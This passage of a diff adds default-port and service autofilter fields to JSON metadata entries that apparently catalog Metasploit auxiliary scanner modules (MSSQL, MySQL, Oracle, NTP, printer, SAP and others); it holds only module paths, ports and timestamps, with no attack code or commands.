"rport": 4786, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-21 21:33:29 +0000", "path": "/modules/auxiliary/scanner/misc/cisco_smart_install.rb", @@ -21593,6 +29725,12 @@ "platform": "", "arch": "", "rport": 3310, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/clamav_control.rb", @@ -21626,6 +29764,12 @@ "platform": "", "arch": "", "rport": 37777, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb", @@ -21657,6 +29801,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb", @@ -21687,6 +29846,12 @@ "platform": "", "arch": "", "rport": 831, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb", @@ -21717,6 +29882,12 @@ "platform": "", "arch": "", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb", @@ -21749,6 +29920,12 @@ "platform": "", "arch": "", "rport": 1099, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/java_rmi_server.rb", @@ -21778,6 +29955,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/oki_scanner.rb", @@ -21807,6 +29990,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb", @@ -21837,6 +30026,12 @@ "platform": "", "arch": "", "rport": 9000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb", @@ -21866,6 +30061,12 @@ "platform": "", "arch": "", "rport": 13364, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb", @@ -21898,6 +30099,12 @@ "platform": "", "arch": "", "rport": 32764, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb", @@ -21927,6 +30134,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb", @@ -21959,6 +30172,12 @@ "platform": "", "arch": "", "rport": 998, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb", @@ -21989,6 +30208,12 @@ "platform": "", "arch": "", "rport": 27017, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-22 08:03:12 +0000", "path": "/modules/auxiliary/scanner/mongodb/mongodb_login.rb", @@ -22018,6 +30243,12 @@ "platform": "", "arch": "", "rport": 407, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/motorola/timbuktu_udp.rb", @@ -22047,6 +30278,13 @@ "platform": "", "arch": "", "rport": 1883, + "autofilter_ports": [ + 1883, + 8883 + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-12-20 18:44:43 +0000", "path": "/modules/auxiliary/scanner/mqtt/connect.rb", @@ -22076,6 +30314,12 @@ "platform": "", "arch": "", "rport": 55553, + "autofilter_ports": [ + 3790 + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-14 06:34:04 +0000", "path": "/modules/auxiliary/scanner/msf/msf_rpc_login.rb", @@ -22105,6 +30349,22 @@ "platform": "", "arch": "", "rport": 3790, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 55553 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/msf/msf_web_login.rb", @@ -22134,6 +30394,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mssql/mssql_hashdump.rb", @@ -22163,6 +30437,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb", @@ -22192,6 +30480,20 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mssql/mssql_ping.rb", @@ -22221,6 +30523,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-08-31 14:08:27 +0000", "path": "/modules/auxiliary/scanner/mssql/mssql_schemadump.rb", @@ -22253,6 +30569,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb", @@ -22283,6 +30605,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_file_enum.rb", @@ -22312,6 +30640,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-02-08 13:48:24 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_hashdump.rb", @@ -22341,6 +30675,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_login.rb", @@ -22370,6 +30710,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_schemadump.rb", @@ -22399,6 +30745,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_version.rb", @@ -22428,6 +30780,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb", @@ -22457,6 +30815,12 @@ "platform": "", "arch": "", "rport": 5351, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb", @@ -22486,6 +30850,12 @@ "platform": "", "arch": "", "rport": 1241, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-09-20 21:25:34 +0000", "path": "/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb", @@ -22515,6 +30885,21 @@ "platform": "", "arch": "", "rport": 8834, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-14 11:16:41 +0000", "path": "/modules/auxiliary/scanner/nessus/nessus_rest_login.rb", @@ -22544,6 +30929,21 @@ "platform": "", "arch": "", "rport": 8834, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb", @@ -22573,6 +30973,21 @@ "platform": "", "arch": "", "rport": 8834, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb", @@ -22602,6 +31017,12 @@ "platform": "", "arch": "", "rport": 137, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/netbios/nbname.rb", @@ -22631,6 +31052,21 @@ "platform": "", "arch": "", "rport": 3780, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb", @@ -22661,6 +31097,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/nfs/nfsmount.rb", @@ -22693,6 +31135,12 @@ "platform": "", "arch": "", "rport": 119, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/nntp/nntp_login.rb", @@ -22725,6 +31173,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_monlist.rb", @@ -22758,6 +31212,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb", @@ -22789,6 +31249,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb", @@ -22820,6 +31286,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb", @@ -22851,6 +31323,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_readvar.rb", @@ -22882,6 +31360,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb", @@ -22913,6 +31397,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb", @@ -22944,6 +31434,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb", @@ -22973,6 +31469,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb", @@ -23002,6 +31513,12 @@ "platform": "", "arch": "", "rport": 9390, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-09-25 09:10:10 +0000", "path": "/modules/auxiliary/scanner/openvas/openvas_omp_login.rb", @@ -23031,6 +31548,12 @@ "platform": "", "arch": "", "rport": 9391, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-09-25 09:10:10 +0000", "path": "/modules/auxiliary/scanner/openvas/openvas_otp_login.rb", @@ -23060,6 +31583,21 @@ "platform": "", "arch": "", "rport": 1158, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/oracle/emc_sid.rb", @@ -23090,6 +31628,21 @@ "platform": "", "arch": "", "rport": 5560, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/oracle/isqlplus_login.rb", @@ -23120,6 +31673,21 @@ "platform": "", "arch": "", "rport": 5560, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb", @@ -23149,6 +31717,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-14 17:36:18 +0000", "path": "/modules/auxiliary/scanner/oracle/oracle_hashdump.rb", @@ -23181,6 +31755,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/oracle/oracle_login.rb", @@ -23210,6 +31790,12 @@ "platform": "", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/oracle/sid_brute.rb", @@ -23240,6 +31826,12 @@ "platform": "", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/oracle/sid_enum.rb", @@ -23269,6 +31861,21 @@ "platform": "", "arch": "", "rport": 1158, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/oracle/spy_sid.rb", @@ -23298,6 +31905,12 @@ "platform": "", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/oracle/tnslsnr_version.rb", @@ -23328,6 +31941,12 @@ "platform": "", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/oracle/tnspoison_checker.rb", @@ -23357,6 +31976,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/oracle/xdb_sid.rb", @@ -23387,6 +32021,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb", @@ -23416,6 +32065,12 @@ "platform": "", "arch": "", "rport": 5631, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb", @@ -23445,6 +32100,12 @@ "platform": "", "arch": "", "rport": 5631, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb", @@ -23474,6 +32135,12 @@ "platform": "", "arch": "", "rport": 5632, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb", @@ -23504,6 +32171,12 @@ "platform": "", "arch": "", "rport": 110, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-14 11:05:54 +0000", "path": "/modules/auxiliary/scanner/pop3/pop3_login.rb", @@ -23533,6 +32206,12 @@ "platform": "", "arch": "", "rport": 110, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/pop3/pop3_version.rb", @@ -23564,6 +32243,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/portmap/portmap_amp.rb", @@ -23593,6 +32278,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/portscan/ack.rb", @@ -23622,6 +32313,13 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/portscan/ftpbounce.rb", @@ -23651,6 +32349,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/portscan/syn.rb", @@ -23681,6 +32385,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/portscan/tcp.rb", @@ -23710,6 +32420,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/portscan/xmas.rb", @@ -23740,6 +32456,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb", @@ -23769,6 +32491,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/postgres/postgres_hashdump.rb", @@ -23800,6 +32528,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/postgres/postgres_login.rb", @@ -23829,6 +32563,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/postgres/postgres_schemadump.rb", @@ -23858,6 +32598,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/postgres/postgres_version.rb", @@ -23890,6 +32636,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb", @@ -23923,6 +32684,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_delete_file.rb", @@ -23956,6 +32723,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_download_file.rb", @@ -23989,6 +32762,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_env_vars.rb", @@ -24022,6 +32801,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_list_dir.rb", @@ -24055,6 +32840,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_list_volumes.rb", @@ -24088,6 +32879,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_ready_message.rb", @@ -24121,6 +32918,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_upload_file.rb", @@ -24154,6 +32957,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_version_info.rb", @@ -24183,6 +32992,12 @@ "platform": "", "arch": "", "rport": 27960, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/quake/server_info.rb", @@ -24217,6 +33032,12 @@ "platform": "", "arch": "", "rport": 3389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rdp/ms12_020_check.rb", @@ -24246,6 +33067,12 @@ "platform": "", "arch": "", "rport": 3389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-09 21:32:15 +0000", "path": "/modules/auxiliary/scanner/rdp/rdp_scanner.rb", @@ -24278,6 +33105,12 @@ "platform": "", "arch": "", "rport": 6379, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/redis/file_upload.rb", @@ -24307,6 +33140,12 @@ "platform": "", "arch": "", "rport": 6379, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/redis/redis_login.rb", @@ -24337,6 +33176,12 @@ "platform": "", "arch": "", "rport": 6379, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/redis/redis_server.rb", @@ -24366,6 +33211,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rogue/rogue_recv.rb", @@ -24395,6 +33246,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rogue/rogue_send.rb", @@ -24425,6 +33282,12 @@ "platform": "", "arch": "", "rport": 512, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rservices/rexec_login.rb", @@ -24455,6 +33318,12 @@ "platform": "", "arch": "", "rport": 513, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rservices/rlogin_login.rb", @@ -24485,6 +33354,12 @@ "platform": "", "arch": "", "rport": 514, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rservices/rsh_login.rb", @@ -24516,6 +33391,12 @@ "platform": "", "arch": "", "rport": 873, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rsync/modules_list.rb", @@ -24547,6 +33428,21 @@ "platform": "", "arch": "", "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb", @@ -24580,6 +33476,22 @@ "platform": "", "arch": "", "rport": 1128, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 1128 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb", @@ -24611,6 +33523,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_icf_public_info.rb", @@ -24640,6 +33567,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb", @@ -24669,6 +33611,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb", @@ -24698,6 +33656,22 @@ "platform": "", "arch": "", 